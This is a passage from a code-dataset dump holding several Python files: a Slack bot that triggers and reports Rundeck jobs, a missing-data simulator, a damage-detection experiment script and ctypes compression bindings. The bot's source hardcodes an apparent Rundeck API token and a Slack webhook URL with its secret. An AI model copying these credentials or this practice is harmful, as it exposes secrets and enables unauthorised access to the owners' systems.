of the job and the date/time it was started and when it finished\\n`!rundeckstatus` - Gives some information about rundecks current state\"\"\",\n# as_user='true:'\n# )\n#\n# if 'that would be great' in text.lower() and link not in text:\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=link,\n# as_user='true:'\n# )\n#\n# if '!listjobs' in text.lower() and \"Command List\" not in text:\n# list_jobs()\n#\n# if text == ('!runjob:rdp') and \"Command List\" not in text:\n# runjobrdp()\n#\n# if text.startswith('!runjob:siteversions:') and \"Command List\" not in text:\n# runjobsiteversions(resources)\n#\n# # TODO Parse 
XML into JSON object to send to Slack\n# if text.startswith(\"!executions\") and \"Command List\" not in text:\n# executions()\n#\n# if text.startswith('!rundeckstatus'):\n# rundeckstatus()\n#\n# if text.startswith(\"!joboutput:\") and \"Command List\" not in text:\n# job_output()\n#\n# if text == (\"!listnodes\"):\n# list_nodes(resources)\n#\n# except Exception as e:\n# print(e)\n"
},
{
"alpha_fraction": 0.5923504829406738,
"alphanum_fraction": 0.6015220880508423,
"avg_line_length": 40.74745559692383,
"blob_id": "96e72dc5e76e4b5c95077196320f169b10101687",
"content_id": "48763817bb500c0423576969d111c8e3d4aaa978",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20498,
"license_type": "permissive",
"max_line_length": 632,
"num_lines": 491,
"path": "/main.py",
"repo_name": "Elygian/slackdeckbot",
"src_encoding": "UTF-8",
"text": "from slackclient import SlackClient\nfrom rundeck.client import Rundeck\nfrom xml.dom import minidom, Node\nfrom TimeConvert import TimeConvert as tc\nfrom datetime import datetime\nimport time\nimport requests\nimport os\nimport sys\nimport json\nimport xml.etree.ElementTree as ET\nimport re\n\n# You need to create 2 environment variables called SLACKBOT_MESSAGEBOT_TOKEN RUNDECK_API_TOKEN and with the correct values, which can be found on the teams slack channel settings\ntoken = os.environ.get('SLACKBOT_MESSAGEBOT_TOKEN')\napitoken = os.environ.get('RUNDECK_API_TOKEN')\n\n#Instantiate the slack api object\nslack_client = SlackClient(token)\n\n#Instantiate the rundeck api object\nrd = Rundeck('rundeck.bsigroup.com',\n api_token='D5lsXIHwBuk5lMKxYa4VMeua4D1JHK4l', protocol='https', port='4443')\n\n#This is the link to the \"that would be great\" piture. Can be removed if you want, make sure to remove the relevant statement in the commands section!\nlink = '<https://cdn.meme.am/instances/400x/33568413.jpg | That would be great>'\n\n#Create a variable with a list of nodes available to the IPP rundeck project\nresources = rd.list_project_resources('IPP')\n\ndef list_jobs():\n #A list of all the jobs on the IPP rundeck project\n jobs = rd.list_jobs('IPP')\n\n #Iterate through the jobs variable and delete anything not relevant to the job name\n for job in jobs:\n del job['project']\n del job['href']\n del job['permalink']\n del job['group']\n del job['description']\n\n #Set the webhook url TODO variablise this\n webhook_url = 'URL HERE'\n\n #Initialise an empty 'attachments' list and 'payload' dictionary for sending attachments to the slack chat\n attachments = []\n payload = {}\n\n #Build an attachment to send to the chat and populate it with job names\n for job in jobs:\n attachment = {}\n if isinstance(job, dict):\n attachment[\"title\"] = job[\"name\"]\n attachment[\"fallback\"] = \"\"\n attachments.append(attachment)\n\n #Carry on building attachment with title text\n payload[\"text\"] = \"Rundeck Job List\"\n payload[\"attachments\"] = attachments\n\n #jsonify the attachments and send them to the webhook created earlier\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n\ndef list_nodes(resources):\n #A list of all the jobs on the IPP rundeck project\n jobs = rd.list_jobs('IPP')\n\n #Empty list of nodes, to which nodes are appended with a for-in loop\n nodes = []\n for key in resources.keys():\n nodes.append(key)\n\n #Same webhoook from earlier TODO variablise this\n webhook_url = 'URL HERE'\n attachments = []\n payload = {}\n\n #Same approach as in list_jobs function, different attachment content. 
This time with COLOUR!\n for node in nodes:\n attachment = {}\n attachment[\"title\"] = str(node)\n attachment[\"fallback\"] = \"\"\n attachment[\"color\"] = \"#27651a\"\n attachments.append(attachment)\n\n payload[\"text\"] = \"Available Nodes on Rundeck\"\n payload[\"attachments\"] = attachments\n\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n\ndef job_output():\n #Get the execution output of a job by slicing the message and taking the execution ID and passing it to the api\n job_output = vars(rd.api.execution(text[11:]))\n\n #Write the job output to an XML file (yaaay XML!) and save it to the dir of the bot.\n job_xml_file = open(\"jobXML.xml\", \"w\")\n job_xml_file.write(str(job_output[\"body\"]))\n job_xml_file.close()\n\n #Parse the XMLwith minidom and assign it to a variable\n jobOutputXML = minidom.parse('jobXML.xml')\n\n #Iterate through job output XML and assign the job name and job description to variables\n job_name = jobOutputXML.getElementsByTagName('name')\n job_description_list = jobOutputXML.getElementsByTagName('description')\n\n #Make sure we dont have any empty fields in the attachments created later\n if job_description_list.length <= 2:\n job_desc = \"No Description\"\n elif job_description_list.length > 2:\n job_desc = job_description_list[0].firstChild.nodeValue\n\n #Get the start and end times of the job by getting the relevant tags from the XML and assigning the data inside the tags to variables\n time_started_var = jobOutputXML.getElementsByTagName('date-started')\n time_finished_var = jobOutputXML.getElementsByTagName('date-ended')\n job_start_time = time_started_var[0].firstChild.nodeValue\n job_end_time = time_finished_var[0].firstChild.nodeValue\n\n #Remove the 'T' and 'Z' characters from the time strings\n for ch in ['T', 'Z']:\n if ch in job_start_time:\n job_start_time = job_start_time.replace(ch, ' ')\n for ch in ['T', 'Z']:\n if ch in job_end_time:\n job_end_time = job_end_time.replace(ch, ' ')\n\n #Create a payload for another slack message attachment\n payload = {}\n\n attachments = [{\"color\": \"#0043c4\", \"title\": job_name[0].firstChild.nodeValue, \"text\": job_desc}, {\n \"color\": \"#0043c4\", \"title\": \"Started: \" + job_start_time, \"text\": \"Finished: \" + job_end_time}]\n\n failed_nodes_obj = jobOutputXML.getElementsByTagName(\"failedNodes\")\n\n payload[\"attachments\"] = attachments\n\n webhook_url = 'https://hooks.slack.com/services/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'\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n #Delete the XML file, might as well try to be neat eh?\n os.remove(\"jobXML.xml\")\n\ndef rundeckstatus():\n #Similar to the previous job, here we create an XML file (yaaay XML!) 
and parse it, getting the version number, node it is running on, uptime and CPU usage\n system_information = vars(rd.api.system_info())\n sysinfo_xml_file = open(\"sysinfoXML.xml\", \"w\")\n sysinfo_xml_file.write(str(system_information[\"body\"]))\n sysinfo_xml_file.close()\n systemInfoXML = minidom.parse('sysinfoXML.xml')\n #Version info\n rundeck_version_info = systemInfoXML.getElementsByTagName('message')\n #XML parsing module number 2, ElementTree :)\n ETXML = ET.parse('sysinfoXML.xml')\n #Getting uptie\n for value in ETXML.getiterator(tag='uptime'):\n uptime = value.attrib['duration']\n hours = int(int(uptime) / (60 * 60 * 1000))\n #Getting CPU usage\n for value in ETXML.getiterator(tag='loadAverage'):\n cpu_usage_element = ET.tostring(value).decode('utf-8')\n cpu_usage = re.findall('\\d+\\.\\d+', cpu_usage_element)\n\n #Post the message to slack\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Rundeck Info :nerd_face: :\" + \"`\" + str(rundeck_version_info[0].firstChild.nodeValue)[16:] + \"`\\n\" + \"Uptime :alarm_clock: : \" + \"`\" + str(\n hours) + \" hours`\\n\" + \"CPU Usage :desktop_computer: : \" + \"`\" + str(cpu_usage[0]) + \"%\" + \"`\\n\",\n as_user='true:'\n )\n #Delete XML file\n os.remove('sysinfoXML.xml')\n\ndef executions():\n #TODO variablise this!!!\n webhook_url = 'https://hooks.slack.com/services/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'\n attachments = []\n payload = {}\n #More XML file creation\n execution_output = vars(rd.api.executions('IPP'))\n executionInfoXML = open(\"executionInfoXML.xml\", \"w\")\n executionInfoXML.write(str(execution_output[\"body\"]))\n executionInfoXML.close()\n\n #Wait why aren't we using minidom here?\n executionsXML = ET.parse('executionInfoXML.xml')\n\n #Get execution info from the XML file and insert it into the attachment fields\n for value in executionsXML.getiterator(tag='execution'):\n attachment = {}\n if isinstance(value.attrib, dict):\n #Job ID\n attachment[\"title\"] = value.attrib[\"id\"]\n #Link to job\n attachment[\"title_link\"] = value.attrib[\"href\"]\n #Status of job i.e running, successful, failed etc\n attachment[\"text\"] = value.attrib[\"status\"]\n attachment[\"fallback\"] = \"\"\n #Colours :D\n if value.attrib[\"status\"] == \"succeeded\":\n attachment[\"color\"] = \"#0dff00\"\n else:\n attachment[\"color\"] = \"#ff0000\"\n attachments.append(attachment)\n #Setting message title text\n payload[\"text\"] = \"Todays rundeck jobs so far :clipboard:\"\n payload[\"attachments\"] = attachments\n #Sending the message to slack, you know the drill ;)\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n os.remove('executionInfoXML.xml')\n\ndef runjobrdp():\n #Notify users not to interact with the bot until the command has finished running TODO figure out how to allow multiple commands simultaneously\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Running Get RDP Sessions job, this could take up to 2 minutes, please wait until the results message comes back before using any other commands\",\n as_user='true:'\n )\n\n #Assign job results to job_object variable. 
This won't happen until the job has finished running on rundeck\n time.sleep(0.5)\n job_object = rd.run_job('488abbce-d06c-4111-a2d3-3d8ae0a393d4',\n argString={'from': 'Rundeck Slack Bot'}, timeout=120)\n\n time.sleep(0.5)\n #Assign results to job results to variable by calling execution output using ID from the RDP job that was just run\n job_results = rd.get_execution_output(job_object[\"id\"])\n\n #Are the colours getting annoying?\n message_colour = \"#00ff39\"\n if job_object[\"status\"] != \"succeeded\":\n message_colour = \"#ff0000\"\n elif job_object[\"status\"] == \"running\":\n message_colour = \"#ffbf00\"\n\n #Build payload to send links to job to slack\n payload = {\n \"attachments\": [\n {\n \"color\": \"%s\" % message_colour,\n \"title\": \"RDP Rundeck Job Page\",\n \"text\": \"Link to the page for the job that was run\",\n \"title_link\": \"%s\" % job_object[\"job\"][\"permalink\"]\n },\n {\n \"color\": \"%s\" % message_colour,\n \"title\": \"RDP Rundeck Job Results Page\",\n \"text\": \"Permalink to the results of this specific job execution\",\n \"title_link\": \"%s\" % job_object[\"href\"]\n }\n ]\n }\n\n #TODO variablise this damnit!\n webhook_url = 'https://hooks.slack.com/services/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'\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n\n time.sleep(0.5)\n job_results = rd.get_execution_output(job_object[\"id\"])\n\n #Build message for list of users with disconected sessions\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Users with disconnected RDP sessions are:\",\n as_user='true:'\n )\n\n rdp_users_text = \"\"\n\n #Build string of usernames\n for result in job_results[\"entries\"]:\n if isinstance(result, dict):\n if \"|\" in result[\"log\"]:\n rdp_users_text += result[\"log\"].split(\"|\", 1)[1] + \",\"\n\n #Send user list to slack\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=rdp_users_text,\n as_user='true:'\n )\n\ndef runjobsiteversions(resources):\n\n '''\n This one's a long one, might want to get a cuppa while you read this :(\n '''\n\n #Check the message text and make sure the node specified in the command matches a node in the list provided by rundeck\n nodes = []\n for key in resources.keys():\n nodes.append(key)\n\n #Notify the user if that have specified a node that doesnt exist (now with emojis!)\n if text[21:] not in nodes:\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"That server doesn't exist :face_with_rolling_eyes: Did you make a typo?\",\n as_user='true:'\n )\n #Notify users not to interact with the bot until the command has returned results\n else:\n\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Running Get Site Versions job, please wait until the results message comes back before using any other commands\",\n as_user='true:'\n )\n\n time.sleep(0.5)\n #Run the job and assign the results object to this variable\n job_object = rd.run_job('242f3848-20fa-4ff9-8014-9acb45a6a7c5',\n argString={'from': 'Rundeck Slack Bot'}, timeout=120, name=text[21:])\n\n #More colours *sigh*\n message_colour = \"#00ff39\"\n if job_object[\"status\"] != \"succeeded\":\n message_colour = \"#ff0000\"\n elif job_object[\"status\"] == \"running\":\n message_colour = \"#ffbf00\"\n\n #More attachment 
building *sigh*\n payload = {\n \"attachments\": [\n {\n \"color\": \"%s\" % message_colour,\n \"title\": \"Site Versions Rundeck Job Page\",\n \"text\": \"Link to the page for the job that was run\",\n \"title_link\": \"%s\" % job_object[\"job\"][\"permalink\"]\n },\n {\n \"color\": \"%s\" % message_colour,\n \"title\": \"Site Versions Rundeck Job Results Page\",\n \"text\": \"Permalink to the results of this specific job execution\",\n \"title_link\": \"%s\" % job_object[\"href\"]\n }\n ]\n }\n\n #More webhook creation *double sigh* can you just variablise this already?\n webhook_url = 'https://hooks.slack.com/services/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'\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n\n time.sleep(0.5)\n #Notify the user that the job is finished and freshly baked results are being flown to the chat by carrier pigeon\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Getting site versions. Give me a minute :thinking_face:\",\n as_user='true:'\n )\n\n #Assign job output to variable TODO see why this is erroring with \"no attribute '_as_dict_method' \"\n version_list_data = rd.get_execution_output(job_object[\"id\"])\n\n #Get version numbers from said results data\n site_version_list = version_list_data[\"entries\"]\n\n #Append version numbers to the newly created log_key_list list\n log_key_list = []\n final_list = {}\n for result in site_version_list:\n log_key_list.append(result[\"log\"])\n\n payload = {}\n attachments = []\n\n #Iterate through results list\n for site_result in log_key_list:\n r = []\n #Here we use regex to split the strings in each index of the list and assign them to variable 'x'\n x = re.split(\"\\s*([d|D]:\\\\\\\\.*)\", site_result)\n #If the string is long enough, we delete the first characters to format the numbers properly\n if len(x) >= 3:\n del x[1]\n del x[1]\n #Split the string again at index 0 into site name and version number\n y = x[0].split()\n if len(y) == 2:\n site_name = y[0]\n site_version = y[1]\n final_list[str(site_name)] = str(site_version)\n if \"host\" in site_name:\n host_name = site_version\n if \"env\" in site_name:\n env_name = site_version\n if \"host\" not in site_name or \"env\" not in site_name:\n attachment = {}\n attachment[\"color\"] = \"#ff0073\"\n attachment[\"title\"] = site_name\n attachment[\"text\"] = site_version\n attachments.append(attachment)\n\n #Format the attachment text with the results and send tham to the chat\n payload[\"text\"] = \"Site Versions: [{}] on [{}]\".format(env_name, host_name)\n payload[\"attachments\"] = attachments\n\n\n response = requests.post(webhook_url, data=json.dumps(payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (response.status_code, response.text))\n\ntry:\n #Connect to the real time messaging API\n if slack_client.rtm_connect():\n #Run forever TODO see about an alternative for this\n while True:\n #Start reading the channel for any matching command strings\n events = slack_client.rtm_read()\n for event in events:\n if (\n 'channel' in event and\n 'text' in event and\n event.get('type') == 'message'\n ):\n channel = event['channel']\n text = event['text']\n\n '''\n This is where we check the 
messages to see if they contain any bot commands. The check for 'Command List' ensures that the !help command does not trigger all the other functions\n '''\n if text == \"!help\":\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"\"\"slackdeckBot Command List:\\n`!listjobs` - This shows a list of jobs currently in the IPP Rundeck project.\\n`!runjob:rdp` - This will run the 'Show RDP Sessions' Rundeck job and return links to the results page.\\n`!executions` - This is a WIP, it will generate an XML file with information about recently executed jobs and save it to the bot's working directory.\\n`!joboutput:[execution_id_number]` - This takes an execution job number and returns the name of the job and the date/time it was started and when it finished\\n`!rundeckstatus` - Gives some information about rundecks current state\"\"\",\n as_user='true:'\n )\n\n if 'that would be great' in text.lower() and link not in text:\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=link,\n as_user='true:'\n )\n\n if '!listjobs' in text.lower() and \"Command List\" not in text:\n list_jobs()\n\n if text == ('!runjob:rdp') and \"Command List\" not in text:\n runjobrdp()\n\n if text.startswith('!runjob:siteversions:') and \"Command List\" not in text:\n runjobsiteversions(resources)\n\n if text.startswith(\"!executions\") and \"Command List\" not in text:\n executions()\n\n if text.startswith('!rundeckstatus'):\n rundeckstatus()\n\n if text.startswith(\"!joboutput:\") and \"Command List\" not in text:\n job_output()\n\n if text == (\"!listnodes\"):\n list_nodes(resources)\n time.sleep(1)\n else:\n print('Connection failed, invalid token?')\nexcept Exception as e:\n print(e)\n"
}
] | 3 |
AlessandroFC15/Framework-SHM-UFPA
|
https://github.com/AlessandroFC15/Framework-SHM-UFPA
|
5e08e779eff13dc3fb66c92a6a90c70eab3fcf99
|
cd96a2817b61575aac1d10a333062b2642bdbe2f
|
a3dc2d8d42ea6b52a142f5e1e6f657a482022742
|
refs/heads/master
| 2020-03-26T13:24:47.036276 | 2018-08-21T15:55:19 | 2018-08-21T15:55:19 | 144,937,621 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7521865963935852,
"alphanum_fraction": 0.7900874614715576,
"avg_line_length": 33.29999923706055,
"blob_id": "76a96af2cfe02a8c8238e2445e562234baa9a284",
"content_id": "492b601e7e6207c2db5986ae0d52f2c5d6857734",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 343,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 10,
"path": "/main.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "from components.missing_data_simulator import MissingDataSimulator\nfrom components.missing_data_amputator import MissingDataAmputator\n\noriginal_data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nsimulator = MissingDataSimulator(original_data, 50)\n\nnew_dataset = simulator.simulate_missing_data()\n\nprint(MissingDataAmputator(new_dataset).amputate_data())\n"
},
{
"alpha_fraction": 0.6023704409599304,
"alphanum_fraction": 0.6142226457595825,
"avg_line_length": 33.150794982910156,
"blob_id": "0958731e7c4e9850cf38a1d4650c29cd936ff6c0",
"content_id": "0636e50ec0634734561c61e7dfbce5f4324356ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4304,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 126,
"path": "/algorithms/damage_detection/damage_detection.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nfrom algoritmos_felipe.DamageDetection import *\n\n\ndef get_average_results(algorithm, missing_data_percentage, num_iterations, imputation_method=None):\n results = {\n 'UCL': 0,\n 'error_type_1': 0,\n 'error_type_2': 0,\n 'true_positives': 0,\n 'true_negatives': 0,\n }\n\n invalid_iterations = 0\n\n for i in range(num_iterations):\n all_data = get_extracted_data(missing_data_percentage, i if missing_data_percentage != 0 else 0,\n imputation_method)\n\n learn_data = all_data[0:158, :]\n\n try:\n algorithm.train_and_test(learn_data, all_data, 197)\n\n results['UCL'] += algorithm.UCL\n results['error_type_1'] += algorithm.err[0]\n results['error_type_2'] += algorithm.err[1]\n results['true_positives'] += len([x for x in algorithm.class_states if x == 1])\n results['true_negatives'] += len([x for x in algorithm.class_states if x == 2])\n except Exception as e:\n invalid_iterations += 1\n print(e)\n\n print('Invalid iterations: {}'.format(invalid_iterations))\n return {key: value / (num_iterations - invalid_iterations) for key, value in results.items()}\n\n\ndef get_extracted_data(missing_data_percentage, iteration_number, imputation_method=None):\n if imputation_method:\n filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/{}/' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(imputation_method.description,\n missing_data_percentage, iteration_number)\n else:\n filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(missing_data_percentage, iteration_number)\n\n data = np.genfromtxt(filename, delimiter=',')\n\n # Pegando apenas as frequências\n data = data[:, [0, 1]]\n return data\n\n\nlist_missing_data_percentage = [5, 7, 10, 15]\n\nresults = {\n 'algorithm': [],\n 'missing_data_percentage': [],\n 'error_type_I': [],\n 'error_type_II': [],\n 'true_positives': [],\n 'true_negatives': [],\n}\n\n# imputation_strategy = DataImputation.MeanImputation\nimputation_strategy = None\n\nfor missing_data_percentage in list_missing_data_percentage:\n num_iterations = 25\n\n print(\">> {}% missing data | {} iterations <<\\n\".format(missing_data_percentage, num_iterations))\n\n # save_features_to_csv_file(missing_data_percentage, num_iterations, imputation_strategy)\n\n algorithms = [\n {'description': 'K-Means',\n 'algorithm': K_Means()},\n\n {'description': 'Fuzzy_C_Means',\n 'algorithm': Fuzzy_C_Means()},\n\n {'description': 'DBSCAN_Center',\n 'algorithm': DBSCAN_Center(0.09, 3)},\n\n {'description': 'Affinity_Propagation',\n 'algorithm': Affinity_Propagation()},\n\n {'description': 'GMM',\n 'algorithm': GMM()},\n\n {'description': 'G_Means',\n 'algorithm': G_Means()},\n ]\n\n for alg in algorithms:\n print(\"# \" + alg['description'])\n\n average_results = get_average_results(alg['algorithm'], missing_data_percentage, num_iterations,\n imputation_strategy)\n\n results['algorithm'].append(alg['description'])\n results['missing_data_percentage'].append(missing_data_percentage)\n results['error_type_I'].append(average_results['error_type_1'])\n results['error_type_II'].append(average_results['error_type_2'])\n results['true_positives'].append(average_results['true_positives'])\n results['true_negatives'].append(average_results['true_negatives'])\n\n print(average_results)\n print()\n\n# plt.legend()\n# plt.show()\n\ndf = pd.DataFrame(results)\n\nprint(df)\n\nif imputation_strategy:\n results_filename = 
'/home/alessandro/Documentos/Programming/Projects/TCC1/results/imputation/' \\\n 'results_{}.csv'.format(imputation_strategy.description)\nelse:\n results_filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/results/new_results_3.csv'\n\ndf.to_csv(results_filename)\n"
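The driver above accumulates per-iteration metrics and divides by the number of iterations that did not raise. A dependency-free sketch of that accumulate-then-average pattern; `run_once` is a stand-in for the real `algorithm.train_and_test` call, and the numbers are illustrative:

```python
def run_once(i):
    # Stand-in for one train/test run; a degenerate clustering raises here.
    if i == 3:
        raise RuntimeError("degenerate clustering")
    return {"error_type_1": i % 2, "error_type_2": 1,
            "true_positives": 30, "true_negatives": 150}


def average_metrics(num_iterations):
    totals = {"error_type_1": 0, "error_type_2": 0,
              "true_positives": 0, "true_negatives": 0}
    invalid = 0
    for i in range(num_iterations):
        try:
            result = run_once(i)
        except RuntimeError:
            invalid += 1  # skip failed iterations, exactly like the script
            continue
        for key, value in result.items():
            totals[key] += value
    return {key: value / (num_iterations - invalid) for key, value in totals.items()}


print(average_metrics(10))
```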
},
{
"alpha_fraction": 0.5422637462615967,
"alphanum_fraction": 0.5545171499252319,
"avg_line_length": 23.81958770751953,
"blob_id": "9a757cf7bd8e96f8760131125f2928ba95cbdd32",
"content_id": "e501cb84229ece5db4a26a1164b364c36d236fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4815,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 194,
"path": "/algoritmos_felipe/Compression.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import ctypes\n\nimport numpy as np\nfrom numpy.ctypeslib import ndpointer\n\nlib = ctypes.cdll.LoadLibrary('./compression_dll.dll')\n\n# ==========\n# APCA\n# ==========\nAPCA_Run = lib.APCA_Run\nAPCA_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\nAPCA_Run.restype = ctypes.c_double\n\n\ndef APCA_Compression(data, eps, relative_eps=False):\n out_data = np.empty(data.shape)\n error_type = 1 if relative_eps else 0\n ratio = APCA_Run(data, data.size, eps, error_type, out_data)\n return out_data, ratio\n\n\n# ==========\n# PCA\n# ==========\n\nPCA_Run = lib.PCA_Run\n\nPCA_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\n\nPCA_Run.restype = ctypes.c_double\n\n\ndef PCA_Compression(data, eps, relative_eps=False):\n out_data = np.empty(data.shape)\n error_type = 1 if relative_eps else 0\n ratio = PCA_Run(data, data.size, eps, error_type, 16, out_data)\n return out_data, ratio\n\n\n# ==========\n# Slide Filter\n# ==========\nSF_Run = lib.SF_Run\n\nSF_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\n\nSF_Run.restype = ctypes.c_double\n\n\ndef SF_Compression(data, eps, relative_eps=False):\n out_data = np.empty(data.shape)\n error_type = 1 if relative_eps else 0\n ratio = SF_Run(data, data.size, eps, error_type, out_data)\n return out_data, ratio\n\n\n# ==========\n# PWHLH\n# ==========\nPWLH_Run = lib.PWLH_Run\n\nPWLH_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\n\nPWLH_Run.restype = ctypes.c_double\n\n\ndef PWLH_Compression(data, eps, relative_eps=False):\n out_data = np.empty(data.shape)\n error_type = 1 if relative_eps else 0\n ratio = PWLH_Run(data, data.size, eps, error_type, out_data)\n return out_data, ratio\n\n\n# ==========\n# CHEB NOT WORKING\n# ==========\nCHEB_Run = lib.CHEB_Run\n\nCHEB_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\n\nCHEB_Run.restype = ctypes.c_double\n\n# ==========\n# RMSE\n# ==========\nRMSE = lib.RMSE\n\nRMSE.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_int]\n\nRMSE.restype = ctypes.c_double\n\n\ndef RMSE_Error(data1, data2):\n assert data1.shape == data2.shape\n return RMSE(data1, data2, data1.size)\n\n\n# ==========\n# STDV\n# ==========\nSTDV = lib.STDV\n\nSTDV.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_int]\n\nSTDV.restype = ctypes.c_double\n\n\ndef StandardDeviation(data1):\n return STDV(data1, data1.size)\n\n\nif __name__ == \"__main__\":\n # indata = np.random.rand(input_size) * 2\n import scipy.io as spio # version 0.17.0\n\n\n def valid(ind, outd, esp):\n for i in range(len(ind)):\n dif = abs(ind[i] - outd[i])\n if not dif <= esp:\n print(\"D\", dif, (dif < esp))\n\n\n matfile = 'Z24Full2.mat'\n matdata = spio.loadmat(matfile)\n a = matdata['Z24_TWN'].T\n data = a[0]\n\n stdv = STDV(data, data.size)\n K = 1\n\n pca_taxas = np.zeros(50)\n apca_taxas = np.zeros(50)\n pwlh_taxas = np.zeros(50)\n 
sf_taxas = np.zeros(50)\n ks = np.zeros(50)\n\n mx = np.max(data)\n mn = np.min(data)\n\n print(stdv)\n\n for k in range(0, 50):\n K = k / 10\n # eps = stdv * K / ( mx - mn)\n eps = K\n print(eps)\n\n pca_result = PCA_Compression(data, eps)\n apca_result = APCA_Compression(data, eps)\n pwlh_result = PWLH_Compression(data, eps)\n sf_result = SF_Compression(data, eps)\n\n pca_taxas[k] = 1 - pca_result[1]\n apca_taxas[k] = 1 - apca_result[1]\n pwlh_taxas[k] = 1 - pwlh_result[1]\n sf_taxas[k] = 1 - sf_result[1]\n ks[k] = K\n\n import matplotlib.pyplot as plt\n\n plt.plot(ks, pca_taxas, 'k')\n plt.plot(ks, apca_taxas, 'b')\n plt.plot(ks, pwlh_taxas, 'r')\n plt.plot(ks, sf_taxas, 'y')\n\n plt.axis([0, 5, 0, 5])\n plt.show()\n"
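The bindings above all follow one recipe: load the DLL, declare `argtypes` with `ndpointer` for the NumPy buffers, set `restype`, then wrap the raw call in a small Python function. A sketch of that recipe against a hypothetical shared library — `libexample.so` and its `compress(in, n, out) -> ratio` symbol are invented for illustration; only the binding mechanics mirror the real file:

```python
import ctypes

import numpy as np
from numpy.ctypeslib import ndpointer

lib = ctypes.cdll.LoadLibrary("./libexample.so")  # hypothetical library

compress = lib.compress
compress.argtypes = [ndpointer(ctypes.c_double, flags="C_CONTIGUOUS"),  # input samples
                     ctypes.c_size_t,                                   # sample count
                     ndpointer(ctypes.c_double, flags="C_CONTIGUOUS")]  # output buffer
compress.restype = ctypes.c_double  # e.g. the achieved compression ratio


def compress_signal(data):
    out = np.empty(data.shape)  # the C function fills this buffer in place
    ratio = compress(data, data.size, out)
    return out, ratio
```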
},
{
"alpha_fraction": 0.5682129859924316,
"alphanum_fraction": 0.5953884124755859,
"avg_line_length": 23.782312393188477,
"blob_id": "b58daf2a8abe741f8679fa9c2b2c9f85dc9f8b21",
"content_id": "f2fda419b6dcf2d75c10dab579dde9b8115723d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3656,
"license_type": "no_license",
